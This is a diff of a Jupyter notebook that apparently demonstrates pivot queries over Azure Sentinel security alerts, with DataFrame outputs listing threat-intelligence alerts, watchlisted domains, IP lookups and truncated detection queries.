+       "3           2020-11-20 03:52:17+00:00        2020-11-20 03:52:17+00:00   \n",
+       "4           2020-11-20 03:52:17+00:00        2020-11-20 03:52:17+00:00   \n",
+       "...                               ...                              ...   \n",
+       "1592 2021-01-30 21:04:21.558000+00:00 2021-02-13 21:04:21.558000+00:00   \n",
+       "1593 2021-01-30 22:04:21.558000+00:00 2021-02-13 22:04:21.558000+00:00   \n",
+       "1594 2021-01-31 02:04:21.558000+00:00 2021-02-14 02:04:21.558000+00:00   \n",
+       "1595 2021-01-31 04:04:21.558000+00:00 2021-02-14 04:04:21.558000+00:00   \n",
+       "1596        2021-02-09 17:25:20+00:00        2021-02-10 01:04:24+00:00   \n",
+       "\n",
+       "                    ProcessingEndTime RemediationSteps  \\\n",
+       "0           2020-11-20 04:06:42+00:00                    \n",
+       "1           2020-11-20 04:06:42+00:00                    \n",
+       "2           2020-11-20 04:06:42+00:00                    \n",
+       "3           2020-11-20 04:06:43+00:00                    \n",
+       "4           2020-11-20 04:06:45+00:00                    \n",
+       "...                               ...              ...   \n",
+       "1592 2021-02-13 21:09:29.084000+00:00                    \n",
+       "1593 2021-02-13 22:09:28.540000+00:00                    \n",
+       "1594 2021-02-14 02:09:28.799000+00:00                    \n",
+       "1595 2021-02-14 04:09:28.953000+00:00                    \n",
+       "1596        2021-02-10 01:09:28+00:00                    \n",
+       "\n",
+       "                                                                                       ExtendedProperties  \\\n",
+       "0     {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"chambresdhotesbruges.fr\\\") | wh...   \n",
+       "1     {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"chambresdhotesbruges.fr\\\") | wh...   \n",
+       "2     {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"chambresdhotesbruges.fr\\\") | wh...   \n",
+       "3     {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"chambresdhotesbruges.fr\\\") | wh...   \n",
+       "4     {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"chambresdhotesbruges.fr\\\") | wh...   \n",
+       "...                                                                                                   ...   \n",
+       "1592  {\\r\\n  \"Query\": \"// The query_now parameter represents the time (in UTC) at which the scheduled ...   \n",
+       "1593  {\\r\\n  \"Query\": \"// The query_now parameter represents the time (in UTC) at which the scheduled ...   \n",
+       "1594  {\\r\\n  \"Query\": \"// The query_now parameter represents the time (in UTC) at which the scheduled ...   \n",
+       "1595  {\\r\\n  \"Query\": \"// The query_now parameter represents the time (in UTC) at which the scheduled ...   \n",
+       "1596  {\\r\\n  \"Query\": \"// The query_now parameter represents the time (in UTC) at which the scheduled ...   \n",
+       "\n",
+       "                                                                                                 Entities  \\\n",
+       "0     [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"chambresdhotesbruges.fr\",\\r\\n    \"HostName\": \"c...   \n",
+       "1     [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"chambresdhotesbruges.fr\",\\r\\n    \"HostName\": \"c...   \n",
+       "2     [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"chambresdhotesbruges.fr\",\\r\\n    \"HostName\": \"c...   \n",
+       "3     [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"chambresdhotesbruges.fr\",\\r\\n    \"HostName\": \"c...   \n",
+       "4     [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"chambresdhotesbruges.fr\",\\r\\n    \"HostName\": \"c...   \n",
+       "...                                                                                                   ...   \n",
+       "1592  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"192.168.1.216\",\\r\\n    \"Type\": \"ip\"\\r\\n  },\\r\\n  ...   \n",
+       "1593  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"192.168.1.216\",\\r\\n    \"Type\": \"ip\"\\r\\n  },\\r\\n  ...   \n",
+       "1594  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"192.168.1.216\",\\r\\n    \"Type\": \"ip\"\\r\\n  },\\r\\n  ...   \n",
+       "1595  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"192.168.1.216\",\\r\\n    \"Type\": \"ip\"\\r\\n  },\\r\\n  ...   \n",
+       "1596  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Url\": \"https://bit.ly/3htG84T\",\\r\\n    \"Type\": \"url\"\\r\\n  },...   \n",
+       "\n",
+       "     SourceSystem               WorkspaceSubscriptionId  \\\n",
+       "0       Detection  d1d8779d-38d7-4f06-91db-9cbc8de0176f   \n",
+       "1       Detection  d1d8779d-38d7-4f06-91db-9cbc8de0176f   \n",
+       "2       Detection  d1d8779d-38d7-4f06-91db-9cbc8de0176f   \n",
+       "3       Detection  d1d8779d-38d7-4f06-91db-9cbc8de0176f   \n",
+       "4       Detection  d1d8779d-38d7-4f06-91db-9cbc8de0176f   \n",
+       "...           ...                                   ...   \n",
+       "1592    Detection  d1d8779d-38d7-4f06-91db-9cbc8de0176f   \n",
+       "1593    Detection  d1d8779d-38d7-4f06-91db-9cbc8de0176f   \n",
+       "1594    Detection  d1d8779d-38d7-4f06-91db-9cbc8de0176f   \n",
+       "1595    Detection  d1d8779d-38d7-4f06-91db-9cbc8de0176f   \n",
+       "1596    Detection  d1d8779d-38d7-4f06-91db-9cbc8de0176f   \n",
+       "\n",
+       "     WorkspaceResourceGroup ExtendedLinks     ProductName  \\\n",
+       "0                       soc                Azure Sentinel   \n",
+       "1                       soc                Azure Sentinel   \n",
+       "2                       soc                Azure Sentinel   \n",
+       "3                       soc                Azure Sentinel   \n",
+       "4                       soc                Azure Sentinel   \n",
+       "...                     ...           ...             ...   \n",
+       "1592                    soc                Azure Sentinel   \n",
+       "1593                    soc                Azure Sentinel   \n",
+       "1594                    soc                Azure Sentinel   \n",
+       "1595                    soc                Azure Sentinel   \n",
+       "1596                    soc                Azure Sentinel   \n",
+       "\n",
+       "                         ProductComponentName  AlertLink  Status  \\\n",
+       "0     Microsoft Threat Intelligence Analytics                New   \n",
+       "1     Microsoft Threat Intelligence Analytics                New   \n",
+       "2     Microsoft Threat Intelligence Analytics                New   \n",
+       "3     Microsoft Threat Intelligence Analytics                New   \n",
+       "4     Microsoft Threat Intelligence Analytics                New   \n",
+       "...                                       ...        ...     ...   \n",
+       "1592                         Scheduled Alerts                New   \n",
+       "1593                         Scheduled Alerts                New   \n",
+       "1594                         Scheduled Alerts                New   \n",
+       "1595                         Scheduled Alerts                New   \n",
+       "1596                         Scheduled Alerts                New   \n",
+       "\n",
+       "     CompromisedEntity       Tactics         Type_y  \\\n",
+       "0          3.88.48.125       Unknown  SecurityAlert   \n",
+       "1          3.88.48.125       Unknown  SecurityAlert   \n",
+       "2          3.88.48.125       Unknown  SecurityAlert   \n",
+       "3          3.88.48.125       Unknown  SecurityAlert   \n",
+       "4          3.88.48.125       Unknown  SecurityAlert   \n",
+       "...                ...           ...            ...   \n",
+       "1592                    Exfiltration  SecurityAlert   \n",
+       "1593                    Exfiltration  SecurityAlert   \n",
+       "1594                    Exfiltration  SecurityAlert   \n",
+       "1595                    Exfiltration  SecurityAlert   \n",
+       "1596                         Unknown  SecurityAlert   \n",
+       "\n",
+       "                            SystemAlertId1  \\\n",
+       "0     45614988-e680-cbc0-4673-babf03147290   \n",
+       "1     2cc59e4f-1cd3-b583-fdc2-96f1837bb0e1   \n",
+       "2     ebfe31f1-bc4b-69a1-521a-84b35a681cd1   \n",
+       "3     1eb1fd38-431d-a69a-bc81-955b7e675ddf   \n",
+       "4     a79e3d8f-ce76-cba5-ea9a-00a89fc4b2a9   \n",
+       "...                                    ...   \n",
+       "1592  b03ba910-9e74-49d3-4454-6338d853400b   \n",
+       "1593  5da44cf1-5f00-b9b0-61eb-d3e5e4051478   \n",
+       "1594  0f0aa0e7-f56a-7f90-c042-a082e33c7bc6   \n",
+       "1595  44df015d-0414-88db-e149-18c9c6f37764   \n",
+       "1596  9efcecb6-1a26-eb48-81ed-f6268080ac60   \n",
+       "\n",
+       "                                                                                      ExtendedProperties1  \\\n",
+       "0     {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"chambresdhotesbruges.fr\\\") | wh...   \n",
+       "1     {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"chambresdhotesbruges.fr\\\") | wh...   \n",
+       "2     {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"chambresdhotesbruges.fr\\\") | wh...   \n",
+       "3     {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"chambresdhotesbruges.fr\\\") | wh...   \n",
+       "4     {\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"chambresdhotesbruges.fr\\\") | wh...   \n",
+       "...                                                                                                   ...   \n",
+       "1592  {\\r\\n  \"Query\": \"// The query_now parameter represents the time (in UTC) at which the scheduled ...   \n",
+       "1593  {\\r\\n  \"Query\": \"// The query_now parameter represents the time (in UTC) at which the scheduled ...   \n",
+       "1594  {\\r\\n  \"Query\": \"// The query_now parameter represents the time (in UTC) at which the scheduled ...   \n",
+       "1595  {\\r\\n  \"Query\": \"// The query_now parameter represents the time (in UTC) at which the scheduled ...   \n",
+       "1596  {\\r\\n  \"Query\": \"// The query_now parameter represents the time (in UTC) at which the scheduled ...   \n",
+       "\n",
+       "                                                                                                Entities1  \\\n",
+       "0     [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"chambresdhotesbruges.fr\",\\r\\n    \"HostName\": \"c...   \n",
+       "1     [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"chambresdhotesbruges.fr\",\\r\\n    \"HostName\": \"c...   \n",
+       "2     [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"chambresdhotesbruges.fr\",\\r\\n    \"HostName\": \"c...   \n",
+       "3     [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"chambresdhotesbruges.fr\",\\r\\n    \"HostName\": \"c...   \n",
+       "4     [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"chambresdhotesbruges.fr\",\\r\\n    \"HostName\": \"c...   \n",
+       "...                                                                                                   ...   \n",
+       "1592  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"192.168.1.216\",\\r\\n    \"Type\": \"ip\"\\r\\n  },\\r\\n  ...   \n",
+       "1593  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"192.168.1.216\",\\r\\n    \"Type\": \"ip\"\\r\\n  },\\r\\n  ...   \n",
+       "1594  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"192.168.1.216\",\\r\\n    \"Type\": \"ip\"\\r\\n  },\\r\\n  ...   \n",
+       "1595  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Address\": \"192.168.1.216\",\\r\\n    \"Type\": \"ip\"\\r\\n  },\\r\\n  ...   \n",
+       "1596  [\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"Url\": \"https://bit.ly/3htG84T\",\\r\\n    \"Type\": \"url\"\\r\\n  },...   \n",
+       "\n",
+       "         MatchingIps src_row_index  \n",
+       "0      [3.88.48.125]             0  \n",
+       "1      [3.88.48.125]             0  \n",
+       "2      [3.88.48.125]             0  \n",
+       "3      [3.88.48.125]             0  \n",
+       "4      [3.88.48.125]             0  \n",
+       "...              ...           ...  \n",
+       "1592  [20.55.97.123]             4  \n",
+       "1593  [20.55.97.123]             4  \n",
+       "1594  [20.55.97.123]             4  \n",
+       "1595  [20.55.97.123]             4  \n",
+       "1596  [20.55.97.123]             4  \n",
+       "\n",
+       "[1597 rows x 64 columns]"
+      ]
+     },
+     "execution_count": 61,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# %%debug\n",
+    "ip_test_df.mp_pivot.run(entities.IpAddress.AzureSentinel.SecurityAlert_list_alerts_for_ip, source_ip_list=\"ip\", join=\"left\")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Inline filtering and `tee` function\n",
+    "\n",
+    "Save intermediate results to a DataFrame"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 50,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<h3>Geo Lookup</h3>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>IP</th>\n",
+       "      <th>City</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Ashburn</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "            IP     City\n",
+       "0  3.88.48.125  Ashburn"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>TenantId</th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>AlertDisplayName</th>\n",
+       "      <th>AlertName</th>\n",
+       "      <th>Severity</th>\n",
+       "      <th>Description</th>\n",
+       "      <th>ProviderName</th>\n",
+       "      <th>VendorName</th>\n",
+       "      <th>VendorOriginalId</th>\n",
+       "      <th>SystemAlertId</th>\n",
+       "      <th>ResourceId</th>\n",
+       "      <th>SourceComputerId</th>\n",
+       "      <th>AlertType</th>\n",
+       "      <th>ConfidenceLevel</th>\n",
+       "      <th>ConfidenceScore</th>\n",
+       "      <th>IsIncident</th>\n",
+       "      <th>StartTimeUtc</th>\n",
+       "      <th>EndTimeUtc</th>\n",
+       "      <th>ProcessingEndTime</th>\n",
+       "      <th>RemediationSteps</th>\n",
+       "      <th>ExtendedProperties</th>\n",
+       "      <th>Entities</th>\n",
+       "      <th>SourceSystem</th>\n",
+       "      <th>WorkspaceSubscriptionId</th>\n",
+       "      <th>WorkspaceResourceGroup</th>\n",
+       "      <th>ExtendedLinks</th>\n",
+       "      <th>ProductName</th>\n",
+       "      <th>ProductComponentName</th>\n",
+       "      <th>AlertLink</th>\n",
+       "      <th>Status</th>\n",
+       "      <th>CompromisedEntity</th>\n",
+       "      <th>Tactics</th>\n",
+       "      <th>Type</th>\n",
+       "      <th>SystemAlertId1</th>\n",
+       "      <th>ExtendedProperties1</th>\n",
+       "      <th>Entities1</th>\n",
+       "      <th>MatchingIps</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d</td>\n",
+       "      <td>2020-12-23 14:08:12+00:00</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>Microsoft threat intelligence analytic has detected Blocked communication to a known WatchList d...</td>\n",
+       "      <td>Threat Intelligence Alerts</td>\n",
+       "      <td>Microsoft</td>\n",
+       "      <td>91d806d3-6b6f-4e5c-a78f-e674d602be51</td>\n",
+       "      <td>625ff9af-dddc-0cf8-9d4b-e79067fa2e71</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>ThreatIntelligence</td>\n",
+       "      <td>83</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2020-12-23 13:48:23+00:00</td>\n",
+       "      <td>2020-12-23 13:48:23+00:00</td>\n",
+       "      <td>2020-12-23 14:08:15+00:00</td>\n",
+       "      <td></td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>d1d8779d-38d7-4f06-91db-9cbc8de0176f</td>\n",
+       "      <td>soc</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Sentinel</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td></td>\n",
+       "      <td>New</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Unknown</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>625ff9af-dddc-0cf8-9d4b-e79067fa2e71</td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...</td>\n",
+       "      <td>[3.88.48.125]</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d</td>\n",
+       "      <td>2020-12-23 14:08:12+00:00</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>Microsoft threat intelligence analytic has detected Blocked communication to a known WatchList d...</td>\n",
+       "      <td>Threat Intelligence Alerts</td>\n",
+       "      <td>Microsoft</td>\n",
+       "      <td>173063c4-10dd-4dd2-9e4f-ec5ed596ec54</td>\n",
+       "      <td>c977f904-ab30-d57e-986f-9d6ebf72771b</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>ThreatIntelligence</td>\n",
+       "      <td>83</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2020-12-23 13:48:23+00:00</td>\n",
+       "      <td>2020-12-23 13:48:23+00:00</td>\n",
+       "      <td>2020-12-23 14:08:15+00:00</td>\n",
+       "      <td></td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>d1d8779d-38d7-4f06-91db-9cbc8de0176f</td>\n",
+       "      <td>soc</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Sentinel</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td></td>\n",
+       "      <td>New</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Unknown</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>c977f904-ab30-d57e-986f-9d6ebf72771b</td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...</td>\n",
+       "      <td>[3.88.48.125]</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d</td>\n",
+       "      <td>2020-12-23 14:08:12+00:00</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>Microsoft threat intelligence analytic has detected Blocked communication to a known WatchList d...</td>\n",
+       "      <td>Threat Intelligence Alerts</td>\n",
+       "      <td>Microsoft</td>\n",
+       "      <td>58b2cda2-11c6-42b8-b6f1-72751cad8f38</td>\n",
+       "      <td>9ee547e4-cba1-47d1-e1f9-87247b693a52</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>ThreatIntelligence</td>\n",
+       "      <td>83</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2020-12-23 13:48:23+00:00</td>\n",
+       "      <td>2020-12-23 13:48:23+00:00</td>\n",
+       "      <td>2020-12-23 14:08:15+00:00</td>\n",
+       "      <td></td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>d1d8779d-38d7-4f06-91db-9cbc8de0176f</td>\n",
+       "      <td>soc</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Sentinel</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td></td>\n",
+       "      <td>New</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Unknown</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>9ee547e4-cba1-47d1-e1f9-87247b693a52</td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...</td>\n",
+       "      <td>[3.88.48.125]</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d</td>\n",
+       "      <td>2020-12-23 14:08:12+00:00</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>Microsoft threat intelligence analytic has detected Blocked communication to a known WatchList d...</td>\n",
+       "      <td>Threat Intelligence Alerts</td>\n",
+       "      <td>Microsoft</td>\n",
+       "      <td>e945f91e-5726-4581-8564-4c04e5414a58</td>\n",
+       "      <td>83a0e08a-1adb-ef75-1c56-f6c9ce25ca69</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>ThreatIntelligence</td>\n",
+       "      <td>83</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2020-12-23 13:48:23+00:00</td>\n",
+       "      <td>2020-12-23 13:48:23+00:00</td>\n",
+       "      <td>2020-12-23 14:08:16+00:00</td>\n",
+       "      <td></td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>d1d8779d-38d7-4f06-91db-9cbc8de0176f</td>\n",
+       "      <td>soc</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Sentinel</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td></td>\n",
+       "      <td>New</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Unknown</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>83a0e08a-1adb-ef75-1c56-f6c9ce25ca69</td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...</td>\n",
+       "      <td>[3.88.48.125]</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d</td>\n",
+       "      <td>2020-12-23 13:53:46+00:00</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>Microsoft threat intelligence analytic has detected Blocked communication to a known WatchList d...</td>\n",
+       "      <td>Threat Intelligence Alerts</td>\n",
+       "      <td>Microsoft</td>\n",
+       "      <td>a95aaf62-9628-418b-8f5f-0f1f26dcdc13</td>\n",
+       "      <td>fde729f6-674b-997a-17eb-e4e7d2b3690d</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>ThreatIntelligence</td>\n",
+       "      <td>83</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>False</td>\n",
+       "      <td>2020-12-23 13:48:23+00:00</td>\n",
+       "      <td>2020-12-23 13:48:23+00:00</td>\n",
+       "      <td>2020-12-23 13:53:47+00:00</td>\n",
+       "      <td></td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>d1d8779d-38d7-4f06-91db-9cbc8de0176f</td>\n",
+       "      <td>soc</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Sentinel</td>\n",
+       "      <td>Microsoft Threat Intelligence Analytics</td>\n",
+       "      <td></td>\n",
+       "      <td>New</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Unknown</td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td>fde729f6-674b-997a-17eb-e4e7d2b3690d</td>\n",
+       "      <td>{\\r\\n  \"Query\": \"CommonSecurityLog| where RequestURL hasprefix(\\\"www.arboretum.hu\\\") | where Tim...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"3\",\\r\\n    \"DnsDomain\": \"www.arboretum.hu\",\\r\\n    \"HostName\": \"www.arbo...</td>\n",
+       "      <td>[3.88.48.125]</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                               TenantId             TimeGenerated  \\\n",
+       "0  8ecf8077-cf51-4820-aadd-14040956f35d 2020-12-23 14:08:12+00:00   \n",
+       "1  8ecf8077-cf51-4820-aadd-14040956f35d 2020-12-23 14:08:12+00:00   \n",
+       "2  8ecf8077-cf51-4820-aadd-14040956f35d 2020-12-23 14:08:12+00:00   \n",
+       "3  8ecf8077-cf51-4820-aadd-14040956f35d 2020-12-23 14:08:12+00:00   \n",
+       "4  8ecf8077-cf51-4820-aadd-14040956f35d 2020-12-23 13:53:46+00:00   \n",
+       "\n",
+       "                          AlertDisplayName  \\\n",
+       "0  Microsoft Threat Intelligence Analytics   \n",
+       "1  Microsoft Threat Intelligence Analytics   \n",
+       "2  Microsoft Threat Intelligence Analytics   \n",
+       "3  Microsoft Threat Intelligence Analytics   \n",
+       "4  Microsoft Threat Intelligence Analytics   \n",
+       "\n",
+       "                                 AlertName Severity  \\\n",
+       "0  Microsoft Threat Intelligence Analytics   Medium   \n",
+       "1  Microsoft Threat Intelligence Analytics   Medium   \n",
+       "2  Microsoft Threat Intelligence Analytics   Medium   \n",
+       "3  Microsoft Threat Intelligence Analytics   Medium   \n",
+       "4  Microsoft Threat Intelligence Analytics   Medium   \n",
+       "\n",
+       "                                                                                           Description  \\\n",
+       "0  Microsoft threat intelligence analytic has detected Blocked communication to a known WatchList d...   \n",
+       "1  Microsoft threat intelligence analytic has detected Blocked communication to a known WatchList d...   \n",
